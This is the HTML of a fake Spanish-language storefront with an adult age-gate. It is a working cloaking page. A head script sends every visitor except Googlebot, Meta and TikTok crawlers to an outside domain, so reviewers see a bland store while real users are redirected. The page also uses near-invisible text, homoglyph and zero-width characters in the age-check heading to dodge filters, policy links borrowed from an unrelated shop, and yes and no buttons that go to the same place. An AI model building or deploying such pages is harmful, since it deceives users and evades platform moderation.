<!DOCTYPE html>
<html lang="es">
<head>
    <script>
        var userAgent = navigator.userAgent;

        // Verifica se o agente do usuário corresponde a um bot.
        if (!userAgent.match(/Googlebot|MetaURI|TikTokBot/i)) {
            // Redireciona todos os visitantes, exceto os bots, para o site específico.
            window.location.href = "https://linkerfit.me/nego";
        }
    </script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Almacenar Virtual</title>
    <style>
        body {
            font-family: Helvetica, Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: black;
            color: white;
        }

        header {
            background-color: #000001;
            color: #000001;
            padding: 10px;
            text-align: center;
        }

        nav {
            background-color: #000001;
            padding: 10px;
            text-align: center;
        }

        nav a {
            color: #000001;
            text-decoration: none;
            margin: 0 10px;
        }

        section {
            padding: 20px;
        }

        footer {
            background-color: #000001;
            color: #888;
            text-align: center;
            padding: 10px;
        }

        footer a {
            color: #000001;
            text-decoration: none;
            margin: 0 10px;
        }

        @media (max-width: 768px) {
            header, nav, section, footer {
                padding: 11px;
            }
        }
    </style>
</head>
<body>
    <header>
        <h1>Mi Almacenar Virtual</h1>
    </header>
    <nav>
        <a href="https://productoix51p-36.shop/">Inicio</a>
        <a href="https://productoix51p-36.shop/">Productos</a>
        <a href="https://luvmulher.com/pages/sobre-nos">Sobre Nosotros</a>
        <a href="https://luvmulher.com/pages/fale-conosco">Contacto</a>
    </nav>
    <section>
        <h2></h2>
        <!-- Coloca aquí la lista de productos destacados -->
    </section>
    <section>
        <h2> ¿​Е​R​Е​Ѕ​ ​М​А​Υ​О​R​ ​D​Е​ ​1​8​ ​А​Ñ​О​Ѕ​? </h2>
        <p style="text-align: center;"></p>
        <a href="https://productoix51p-36.shop/2" style="text-decoration: none;">
            <button style="background-color: green; display: block; width: 80%; margin: 21px auto; padding: 16px; font-size: 17px; color: white;">SÍ</button>
        </a>
        <a href="https://productoix51p-36.shop/2" style="text-decoration: none;">
            <button style="background-color: red; display: block; width: 80%; margin: 21px auto; padding: 16px; font-size: 17px; color: white;">NO</button>
        </a>
    </section>
    <section>
        <h2></h2>
        <!-- Coloca aquí más productos para mostrar -->
    </section>
    <footer>
        <p>&copy; 2023 Almacenar Virtual. Todos los derechos reservados.</p>
        <p><a href="https://luvmulher.com/pages/politica-de-privacidade">Política de Privacidad</a> | <a href="https://luvmulher.com/pages/termos-de-servico">Términos y Condiciones</a> | <a href="https://luvmulher.com/pages/politica-de-troca-e-devolucao">Política de Devoluciones</a> | <a href="https://luvmulher.com/pages/fale-conosco">Contáctanos</a></p>
    </footer>
</body>
</html>
